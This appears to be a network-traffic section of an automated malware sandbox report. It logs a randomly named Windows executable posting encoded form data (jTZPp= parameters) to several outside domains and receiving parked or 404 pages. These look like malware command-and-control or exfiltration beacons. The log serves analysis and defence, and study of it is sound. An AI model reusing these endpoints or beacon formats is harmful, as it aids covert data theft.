                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 57 62 34 78 4e 4a 48 2b 58 56 44 45 4d 4d 73 76 74 45 39 31 33 7a 35 67 38 6a 32 51 42 38 42 48 4c 49 75 68 66 66 65 4f 63 55 6b 65 57 38 30 55 63 66 6f 38 77 55 63 31 75 4d 6c 41 56 54 46 2f 77 38 71 38 41 52 36 6d 2f 75 59 4d 70 33 62 49 72 47 37 44 35 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Wb4xNJH+XVDEMMsvtE913z5g8j2QB8BHLIuhffeOcUkeW80Ucfo8wUc1uMlAVTF/w8q8AR6m/uYMp3bIrG7D5A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                May 28, 2024 07:16:18.937027931 CEST575INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjM0NDIyNWItZTA1Ni00NGI4LWE0YmQtN2Y5MmM2OTc5YTMxIiwicGFnZV90aW1lIjoxNzE2ODczMz


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                12192.168.2.649724199.59.243.225801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:16:20.997710943 CEST478OUTGET /gy0x/?5L0=2bCPy0&jTZPp=q3tVqQVST/58pKcjgu6vzl4r/mjx+/3v5p1oiGGfWC80c0QmTZc7sue0joIh5TaOhvctfB+I4hP6RP0S+zGuZLn5ZOGHWIzMGtqXZLXUxKwwwvK+KKFBFwNnv8XJAo+gt0xcEPY= HTTP/1.1
                                Host: www.etrading.cloud
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:16:21.480499983 CEST1236INHTTP/1.1 200 OK
                                date: Tue, 28 May 2024 05:16:21 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 1498
                                x-request-id: 2c0692bb-ef8f-4120-8cb0-f1e7f41b0ff1
                                cache-control: no-store, max-age=0
                                accept-ch: sec-ch-prefers-color-scheme
                                critical-ch: sec-ch-prefers-color-scheme
                                vary: sec-ch-prefers-color-scheme
                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_y3wu632yysqXHgvsccw/i7pzX3AotD5zqn/6huOnLzY3QyUTrx+V1SU4c0f9GtyCV9KCkWMBC6gF0XsBQ0EpyA==
                                set-cookie: parking_session=2c0692bb-ef8f-4120-8cb0-f1e7f41b0ff1; expires=Tue, 28 May 2024 05:31:21 GMT; path=/
                                connection: close
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 79 33 77 75 36 33 32 79 79 73 71 58 48 67 76 73 63 63 77 2f 69 37 70 7a 58 33 41 6f 74 44 35 7a 71 6e 2f 36 68 75 4f 6e 4c 7a 59 33 51 79 55 54 72 78 2b 56 31 53 55 34 63 30 66 39 47 74 79 43 56 39 4b 43 6b 57 4d 42 43 36 67 46 30 58 73 42 51 30 45 70 79 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_y3wu632yysqXHgvsccw/i7pzX3AotD5zqn/6huOnLzY3QyUTrx+V1SU4c0f9GtyCV9KCkWMBC6gF0XsBQ0EpyA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                May 28, 2024 07:16:21.480524063 CEST951INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmMwNjkyYmItZWY4Zi00MTIwLThjYjAtZjFlN2Y0MWIwZmYxIiwicGFnZV90aW1lIjoxNzE2ODczMz


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                13192.168.2.64972546.30.215.104801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:16:26.572362900 CEST755OUTPOST /5s1a/ HTTP/1.1
                                Host: www.ceo-retreats.co.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 210
                                Origin: http://www.ceo-retreats.co.uk
                                Referer: http://www.ceo-retreats.co.uk/5s1a/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 35 68 43 61 34 35 4d 6c 52 76 46 59 32 39 62 65 48 6c 55 79 74 5a 76 6a 64 50 55 56 39 45 77 53 46 6f 4b 6f 70 47 7a 6a 33 44 47 69 63 43 5a 59 56 31 47 54 76 61 73 61 45 68 64 50 6e 69 30 46 54 7a 38 32 50 50 66 4f 49 43 42 74 78 62 44 4c 71 75 57 66 75 2f 74 45 79 42 6f 49 64 2b 63 34 45 36 48 44 4b 2f 58 79 44 51 42 43 35 58 42 6c 41 6b 6d 46 31 51 67 46 74 35 35 5a 5a 39 7a 72 4f 35 72 41 37 6a 77 32 79 51 41 4f 4f 6e 30 45 45 6d 7a 7a 70 61 49 6f 62 36 7a 31 6b 44 77 73 56 68 58 2b 45 76 42 37 44 33 72 52 36 6b 70 6e 4d 31 6a 6a 71 2f 39 62 35 53 35 49 57 6d 4b 76 43 46 50 72 34 52 32 47 4c 47 30 34
                                Data Ascii: jTZPp=5hCa45MlRvFY29beHlUytZvjdPUV9EwSFoKopGzj3DGicCZYV1GTvasaEhdPni0FTz82PPfOICBtxbDLquWfu/tEyBoId+c4E6HDK/XyDQBC5XBlAkmF1QgFt55ZZ9zrO5rA7jw2yQAOOn0EEmzzpaIob6z1kDwsVhX+EvB7D3rR6kpnM1jjq/9b5S5IWmKvCFPr4R2GLG04
                                May 28, 2024 07:16:27.226155996 CEST451INHTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:16:27 GMT
                                Server: Apache
                                Content-Length: 196
                                Content-Type: text/html; charset=iso-8859-1
                                X-Onecom-Cluster-Name:
                                X-Varnish: 247437343
                                Age: 0
                                Via: 1.1 webcache2 (Varnish/trunk)
                                Connection: close
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                14192.168.2.64972646.30.215.104801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:16:29.112207890 CEST779OUTPOST /5s1a/ HTTP/1.1
                                Host: www.ceo-retreats.co.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 234
                                Origin: http://www.ceo-retreats.co.uk
                                Referer: http://www.ceo-retreats.co.uk/5s1a/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 35 68 43 61 34 35 4d 6c 52 76 46 59 33 64 4c 65 45 48 38 79 71 35 76 6b 59 50 55 56 33 6b 78 56 46 6f 4f 6f 70 45 66 4e 33 58 71 69 63 69 4a 59 55 33 2b 54 75 61 73 61 44 52 64 4f 70 43 30 62 54 7a 67 2b 50 4e 4c 4f 49 43 39 74 78 61 7a 4c 71 64 2b 63 76 76 74 47 6d 78 6f 4b 51 65 63 34 45 36 48 44 4b 38 72 59 44 52 70 43 35 48 64 6c 47 46 6d 47 70 41 67 61 73 35 35 5a 64 39 7a 33 4f 35 71 76 37 69 73 50 79 57 45 4f 4f 6c 73 45 48 33 7a 77 67 61 49 75 57 61 79 52 70 78 46 56 4d 44 6a 2b 61 39 6c 4c 43 6b 7a 48 32 79 6f 39 51 47 6a 41 34 76 64 5a 35 51 68 36 57 47 4b 46 41 46 33 72 71 47 36 68 45 79 52 62 2f 58 54 67 71 4e 36 59 79 46 46 42 6b 58 73 72 32 41 2b 5a 38 77 3d 3d
                                Data Ascii: jTZPp=5hCa45MlRvFY3dLeEH8yq5vkYPUV3kxVFoOopEfN3XqiciJYU3+TuasaDRdOpC0bTzg+PNLOIC9txazLqd+cvvtGmxoKQec4E6HDK8rYDRpC5HdlGFmGpAgas55Zd9z3O5qv7isPyWEOOlsEH3zwgaIuWayRpxFVMDj+a9lLCkzH2yo9QGjA4vdZ5Qh6WGKFAF3rqG6hEyRb/XTgqN6YyFFBkXsr2A+Z8w==
                                May 28, 2024 07:16:29.760127068 CEST451INHTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:16:29 GMT
                                Server: Apache
                                Content-Length: 196
                                Content-Type: text/html; charset=iso-8859-1
                                X-Onecom-Cluster-Name:
                                X-Varnish: 275448000
                                Age: 0
                                Via: 1.1 webcache2 (Varnish/trunk)
                                Connection: close
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                15192.168.2.64972746.30.215.104801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:16:31.647429943 CEST1792OUTPOST /5s1a/ HTTP/1.1
                                Host: www.ceo-retreats.co.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 1246
                                Origin: http://www.ceo-retreats.co.uk
                                Referer: http://www.ceo-retreats.co.uk/5s1a/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 35 68 43 61 34 35 4d 6c 52 76 46 59 33 64 4c 65 45 48 38 79 71 35 76 6b 59 50 55 56 33 6b 78 56 46 6f 4f 6f 70 45 66 4e 33 58 69 69 63 77 78 59 55 57 2b 54 74 61 73 61 4d 42 64 44 70 43 31 65 54 7a 6f 79 50 4e 58 30 49 45 35 74 33 35 37 4c 68 4d 2b 63 67 76 74 47 35 68 6f 50 64 2b 63 68 45 37 32 4c 4b 2f 44 59 44 52 70 43 35 47 74 6c 46 55 6d 47 72 41 67 46 74 35 34 4c 5a 39 7a 4c 4f 36 61 56 37 68 41 66 78 6d 6b 4f 50 46 38 45 47 42 66 77 38 4b 49 73 54 61 79 4a 70 78 5a 30 4d 48 43 4e 61 35 73 44 43 6d 76 48 30 7a 45 6b 4e 55 4c 55 6b 4e 42 5a 6e 6a 42 63 53 78 47 6f 42 6e 7a 4b 73 47 47 6e 44 54 5a 34 79 77 50 2b 69 74 6e 48 79 6a 35 4f 74 78 52 4a 37 7a 37 69 6e 52 65 76 57 67 78 79 4e 35 57 6d 67 79 79 7a 2f 67 68 69 71 33 2f 53 67 39 72 4b 46 6a 75 63 31 6a 38 49 79 55 61 70 36 53 5a 33 58 35 36 72 49 6c 6e 38 53 54 48 43 38 55 73 57 35 7a 2b 78 56 64 70 70 53 44 4d 43 65 66 53 4a 4a 42 2b 59 4a 41 43 53 48 4a 5a 50 4e 77 64 69 74 71 6d 76 4a 71 68 67 50 52 37 4e 38 70 76 50 [TRUNCATED]
                                Data Ascii: jTZPp=5hCa45MlRvFY3dLeEH8yq5vkYPUV3kxVFoOopEfN3XiicwxYUW+TtasaMBdDpC1eTzoyPNX0IE5t357LhM+cgvtG5hoPd+chE72LK/DYDRpC5GtlFUmGrAgFt54LZ9zLO6aV7hAfxmkOPF8EGBfw8KIsTayJpxZ0MHCNa5sDCmvH0zEkNULUkNBZnjBcSxGoBnzKsGGnDTZ4ywP+itnHyj5OtxRJ7z7inRevWgxyN5Wmgyyz/ghiq3/Sg9rKFjuc1j8IyUap6SZ3X56rIln8STHC8UsW5z+xVdppSDMCefSJJB+YJACSHJZPNwditqmvJqhgPR7N8pvPIWXWgC6EO4z7pw9MJgsK8JMDC57cfc0OwR2vAuPpXbzKsCGrnOGIQhQghdMok2vyhMDP3dCxX5fE/Z6LKnFoLmGDOzwivGknTzs2uHXf+/3kjVdC6zS7WDSBBud+hrcQMZi4egDHcXMBkZvERwtSis4bSgQ3zC6vn9KrjhfiiKJl7yJ0XeSDzMhnapiIMBsl1JHkRxxPnjJVy0ekev/rYpWKWMSnegFDrXnEcA7gW3MplF1YJaF0lQafDjRQAYN9RpaveLbSUtdG1wUrhgkWNCpjqAfEuDHU7ycqbgUN00rZS8uMj94S3/WRKBRCovBo82MI0soPvIKsa1e0q+TJfVCp9WJXl6610aCfShlSBEnxNpaDF6pu8uSb5AQ5DaRI0XW7lf+NZ3okKdZFnN3if4+05t9Ya9jNdDTPA+vznIQt+ZY/xB/8XvXT5cYetSdt70lHNouhy+SAfwMY/guhMtQRhkRWc4CDZ+MEk7O54UuXHbVEKH0eyPay0e1eu/35tpn0Pxqe875ZHv42JBGLTzwPNR/4+x5eDtbEvot8TvAdiaLJr91Ib/WJz2KKVWhvWeEgVeydhIBHccodcCywN33Up1lOSP6PZAlBwt4LrAMewHQT6REnUbvGdj+s9Iaou7EtvJodsr1OzWTCaiHqd6QKMwUTVJ8SVq [TRUNCATED]
                                May 28, 2024 07:16:32.310722113 CEST451INHTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:16:32 GMT
                                Server: Apache
                                Content-Length: 196
                                Content-Type: text/html; charset=iso-8859-1
                                X-Onecom-Cluster-Name:
                                X-Varnish: 229319986
                                Age: 0
                                Via: 1.1 webcache2 (Varnish/trunk)
                                Connection: close
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                16192.168.2.64972846.30.215.104801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:16:34.173558950 CEST482OUTGET /5s1a/?jTZPp=0jq67MNPRq4g2+jjEmEFgdmxU9xn3lZuU82S2yL3jkWaNmBkMCuTzs1oACp+jQZQfFcSAdfVUnty14PGpb+cvJdHxRsAacQFCcCRXvTpLBxg40F9NDu9hRQlsdpJQY/jGZexiU8=&5L0=2bCPy0 HTTP/1.1
                                Host: www.ceo-retreats.co.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:16:34.811148882 CEST451INHTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:16:34 GMT
                                Server: Apache
                                Content-Length: 196
                                Content-Type: text/html; charset=iso-8859-1
                                X-Onecom-Cluster-Name:
                                X-Varnish: 273023697
                                Age: 0
                                Via: 1.1 webcache2 (Varnish/trunk)
                                Connection: close
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                17192.168.2.64972992.205.15.157801364C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                TimestampBytes transferredDirectionData
                                May 28, 2024 07:16:39.845788956 CEST755OUTPOST /ia1k/ HTTP/1.1
                                Host: www.mavonorm-global.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 210
                                Origin: http://www.mavonorm-global.uk
                                Referer: http://www.mavonorm-global.uk/ia1k/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Raw: 6a 54 5a 50 70 3d 41 35 69 58 34 36 63 2f 35 57 37 45 52 39 51 44 62 5a 47 76 47 63 56 67 5a 41 6a 48 68 76 44 6e 32 68 6c 7a 71 4b 53 5a 44 4e 74 32 32 59 69 6f 33 52 66 2b 56 31 72 7a 71 53 6f 41 58 70 2b 73 69 35 51 65 4c 32 6f 55 7a 4a 6d 64 35 6a 49 4b 42 66 50 54 7a 54 73 70 4f 62 6b 4e 62 52 55 69 76 4c 41 69 6f 53 41 6a 4b 30 32 78 73 46 6e 4c 54 59 46 34 63 44 32 53 48 79 6d 6c 35 43 72 46 70 71 64 49 79 31 43 31 49 64 71 6b 4f 6d 6b 62 52 7a 57 57 62 59 75 4c 76 48 61 46 32 59 69 4b 4e 46 55 65 37 4a 5a 4b 59 76 44 45 63 61 36 61 38 61 59 68 35 4e 73 48 51 42 45 78 59 73 73 79 45 62 6b 79 36 58 56 37 2b 48 72 4e
                                Data Ascii: jTZPp=A5iX46c/5W7ER9QDbZGvGcVgZAjHhvDn2hlzqKSZDNt22Yio3Rf+V1rzqSoAXp+si5QeL2oUzJmd5jIKBfPTzTspObkNbRUivLAioSAjK02xsFnLTYF4cD2SHyml5CrFpqdIy1C1IdqkOmkbRzWWbYuLvHaF2YiKNFUe7JZKYvDEca6a8aYh5NsHQBExYssyEbky6XV7+HrN
                                May 28, 2024 07:16:40.598762035 CEST1236INHTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:16:40 GMT
                                Server: Apache
                                X-Powered-By: PHP/8.1.28
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Link: <https://mavonorm-global.uk/wp-json/>; rel="https://api.w.org/"
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Vary: Accept-Encoding
                                Content-Encoding: br
                                Content-Length: 10723
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 13 32 df 14 91 9a f4 43 40 45 60 dc c4 c7 3a cf f7 ff 7b 53 fb 6f eb e7 eb 86 9c da 22 05 0c 68 b5 54 b9 4b 3a 4b 66 d9 d2 be ad c9 c9 c1 12 b6 d5 ca 42 0f f0 36 1a fd 9f bf ec 33 1c 58 c6 90 20 da 10 78 be 34 d1 6e 90 23 86 e3 7b 6f 55 fd 5f af 9f 7a cf 6b c1 ba 35 70 4e 6b 34 f6 91 3e 4a 03 bb 5c 75 0b de eb d7 af 5b 3c c8 66 cd 2c 01 66 81 11 93 c4 49 dc 32 b6 81 83 c4 41 4a 41 14 38 f6 63 98 d6 ec bf 76 fb 0d 22 a2 02 a2 36 ed bd 86 da f1 63 a5 dd 09 22 8e 24 0a 48 db 37 19 cb 92 3e bf bd cf c2 04 05 93 c8 26 78 bb 26 87 d5 ba f7 55 25 09 fa 62 66 ef 1e 43 75 f6 de 78 3e 2a c6 0e 12 1f 23 60 74 1d 70 0d 98 74 76 85 74 bf c0 c1 3e cc a2 90 ed 13 15 2a 76 b9 97 18 2e 6b 4a 01 d1 42 c7 a0 68 ab d2 1d 23 90 5b 2a dd 46 25 70 99 4f c9 a2 f4 27 dc e2 65 7a 71 50 97 63 60 8c d2 21 97 49 91 cf 64 11 99 f2 0b ec 9b 85 de 78 60 97 86 ba 3b 57 88 12 7e bd 02 9f 8c c3 9d dd 3e 78 d3 b5 fd 37 d8 e6 74 d5 a2 e9 1d ca eb d8 6a 5f ef 17 47 6c f8 4c cb e5 41 9d 4c 6f ec 81 f2 6a 27 3b 7e 4b 49 c5 ad 80 b8 99 d4 [TRUNCATED]
